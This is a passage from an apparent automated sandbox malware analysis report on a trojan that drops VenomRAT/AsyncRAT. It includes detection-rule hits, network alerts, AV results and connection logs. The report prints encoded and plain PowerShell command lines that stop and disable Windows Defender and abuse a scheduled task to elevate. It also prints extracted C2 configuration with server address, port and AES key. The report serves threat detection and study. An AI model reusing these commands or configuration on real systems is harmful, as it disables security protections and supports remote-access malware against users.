BpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQA

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "C:\Windows\system32\net1.exe" start TrustedInstaller, CommandLine: "C:\Windows\system32\net1.exe" start TrustedInstaller, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net1.exe, NewProcessName: C:\Windows\System32\net1.exe, OriginalFileName: C:\Windows\System32\net1.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQA

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMA

Sigma detected: Start Windows Service Via Net.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\system32\net1.exe" start TrustedInstaller, CommandLine: "C:\Windows\system32\net1.exe" start TrustedInstaller, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net1.exe, NewProcessName: C:\Windows\System32\net1.exe, OriginalFileName: C:\Windows\System32\net1.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQA

Sigma detected: Stop Windows Service Via Net.EXE

Source: Process started

Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\net1.exe" stop windefend, CommandLine: "C:\Windows\system32\net1.exe" stop windefend, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\net1.exe, NewProcessName: C:\Windows\System32\net1.exe, OriginalFileName: C:\Windows\System32\net1.exe, ParentCommandLine: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4476, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net1.exe" stop windefend, ProcessId: 4196, ProcessName: net1.exe

Snort Signatures

ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) - Source IP: 66.235.168.242 - Destination IP: 192.168.2.5

Timestamp:	05/23/24-15:34:03.340807
SID:	2848152
Source Port:	3232
Destination Port:	61009
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Malicious SSL Cert (VenomRAT) - Source IP: 66.235.168.242 - Destination IP: 192.168.2.5

Timestamp:	05/23/24-15:34:03.427478
SID:	2052265
Source Port:	4449
Destination Port:	61010
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Avira: detection malicious, Label: TR/Spy.Agent.qbvjl

Found malware configuration

Source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VenomRAT {"Server": "66.235.168.242", "Ports": "3232", "Version": "", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Loaader.exe", "AES_key": "tE8IGfk7UYxxW5jF9uxnGzkxU8UnVy3F", "Mutex": "iFe4z2UwXC6AffU6", "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "ServerSignature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
Source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Ports": ["3232"], "Server": ["66.235.168.242"], "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "Server Signature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8="}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Client.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\Loaader.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Loader.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	ReversingLabs: Detection: 73%
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Virustotal: Detection: 82%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF8491200F2 CryptUnprotectData,		20_2_00007FF8491200F2
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF84912DDB5 CryptUnprotectData,		20_2_00007FF84912DDB5

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.5:61173 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61192 version: TLS 1.2
